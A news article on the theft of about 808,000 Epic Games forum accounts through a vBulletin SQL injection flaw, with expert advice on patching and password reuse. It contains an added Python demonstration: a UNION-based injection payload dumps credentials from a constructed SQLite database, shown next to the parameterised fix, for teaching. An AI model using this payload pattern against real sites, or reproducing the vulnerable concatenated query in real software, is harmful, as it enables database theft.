Epic hack, thousands of salted logins stolen
A hacker has stolen around 808,000 accounts from two forums run by Epic Games, which makes Unreal Engine.
Over half a million of them come from the Unreal Engine forum. According to breach alert website LeakedSource.com, the breach occurred on 11th August.
The identity of the hacker is not currently known. The attack was carried out using a known SQL injection vulnerability in older versions of the vBulletin forum software, which gave the hacker full read access to the database.
The hacker made off with email addresses, salted password hashes, usernames, IP addresses, birth dates, join dates, full post histories and comments, including private messages.
Also, Facebook access tokens were stolen from those who logged in using that method.
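As an added illustration (this is not code from the article, from Epic Games or from vBulletin, and it does not reproduce the specific vBulletin flaw), the following Python script shows the pattern behind a breach like the one described above: a forum search query assembled by string concatenation, a UNION-based payload that turns it into a dump of the user table, including the salted hashes, and the parameterised query that treats the same payload as inert text. The SQLite schema, table and column names and sample rows are all constructed for this example.

```python
"""Added example: SQL injection against a forum-style search endpoint,
with the vulnerable query beside its parameterised fix.

Everything here is constructed for illustration: the in-memory SQLite
database, the 'users' and 'posts' tables, their columns and the rows.
The hash values are placeholders, not real credentials."""
import sqlite3


def make_db():
    """Build a throwaway database with a constructed users and posts table."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "email TEXT, salt TEXT, password_hash TEXT)"
    )
    cur.execute(
        "CREATE TABLE posts (id INTEGER PRIMARY KEY, author TEXT, body TEXT)"
    )
    cur.executemany(
        "INSERT INTO users (username, email, salt, password_hash) VALUES (?, ?, ?, ?)",
        [
            ("alice", "alice@example.com", "a1b2", "5f4dcc3b5aa765d61d8327deb882cf99"),
            ("bob", "bob@example.com", "c3d4", "e10adc3949ba59abbe56e057f20f883e"),
        ],
    )
    cur.executemany(
        "INSERT INTO posts (author, body) VALUES (?, ?)",
        [
            ("alice", "Welcome to the Unreal Engine forum"),
            ("bob", "How do I build the editor from source?"),
        ],
    )
    conn.commit()
    return conn


def search_posts_vulnerable(conn, term):
    """The bug: attacker-controlled `term` is spliced into the SQL text,
    so a single quote in `term` ends the string literal and the rest
    of the input is parsed as SQL."""
    sql = "SELECT author, body FROM posts WHERE body LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_posts_safe(conn, term):
    """The fix: the query text is fixed and the value is bound as a
    parameter, so the database never parses the input as SQL."""
    sql = "SELECT author, body FROM posts WHERE body LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


# UNION payload: closes the LIKE literal, appends a SELECT with the same
# column count (2) that pulls credentials out of `users`, then comments
# out the trailing "%'" that the vulnerable query still appends.
PAYLOAD = (
    "' UNION SELECT username, email || ':' || salt || ':' || password_hash "
    "FROM users -- "
)


def dumped_credentials(conn):
    """Run the payload through the vulnerable search and return only the
    rows that came from the users table (the search results for '%'
    match every post, so the post rows come back as well)."""
    rows = search_posts_vulnerable(conn, PAYLOAD)
    return sorted(r for r in rows if ":" in r[1] and "@" in r[1])


if __name__ == "__main__":
    db = make_db()
    print("vulnerable search leaks:", dumped_credentials(db))
    print("safe search with same payload:", search_posts_safe(db, PAYLOAD))
    print("safe search, legitimate term:", search_posts_safe(db, "editor"))
```

The vulnerable search returns every post plus one row per user containing the email, salt and hash; the parameterised search, given the identical payload, looks for posts whose body literally contains the payload string and returns nothing. The fix is a single change in how the query is built, which is why the article's point about keeping software patched matters: the hard part is not writing the safe query, it is making sure the old concatenating one is no longer deployed.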
LeakedSource.com says the password hashing scheme differs from the one seen in other databases it holds, suggesting that Epic Games used a different password hashing algorithm from those seen in other breaches such as Dota 2 and, more recently, DLH.net.
Breaches like this are yet another reminder of the danger of running software that isn't patched to the latest version. The vulnerability that enabled this hack is reportedly well known among attackers.
LeakedSource added the breached data into its database to allow possible victims to see if they have been affected by this hack. The company also included the password hashes.
Epic Games confirmed the hack in a statement on its website, saying that: “If you have been active on these forums since July 2015, we recommend you change your password on any site where you use the same password.”
Barry Scott, CTO of Centrify Corporation, commented on the DOTA2 breach, and his advice still rings true: “It's disappointing we still see such hacks and it's really important that web developers close wide open doors like this that are letting hackers in. As users, in spite of all the advice we're given, we are often STILL guilty of using the same password for different web accounts.”
Scott went on: “As well as not re-using passwords, users should switch on “multi-factor authentication” if offered by their apps, which will protect them if the password is stolen by requiring another piece of information before allowing a successful login, often by entering a code via their mobile phone.”
Ryan O'Leary, vice president of the threat research centre at WhiteHat Security, told SCMagazineUK.com: "SQL injection is a really easy avenue for hackers to steal personal information on a large scale from vulnerable databases. SQLi is actually one of the very first skills you learn when trying to attack a site, because of the prevalence of the flaw and ease of exploitation. Our research has found that around six per cent of websites have at least one SQL injection vulnerability. Six per cent may not seem like a large proportion, but when you think of it as six out of every 100 websites you use that have this particularly nasty vulnerability, it suddenly seems a staggeringly large amount. Companies need to run a thorough vulnerability assessment and fix these critical, yet easy-to-exploit, vulnerabilities."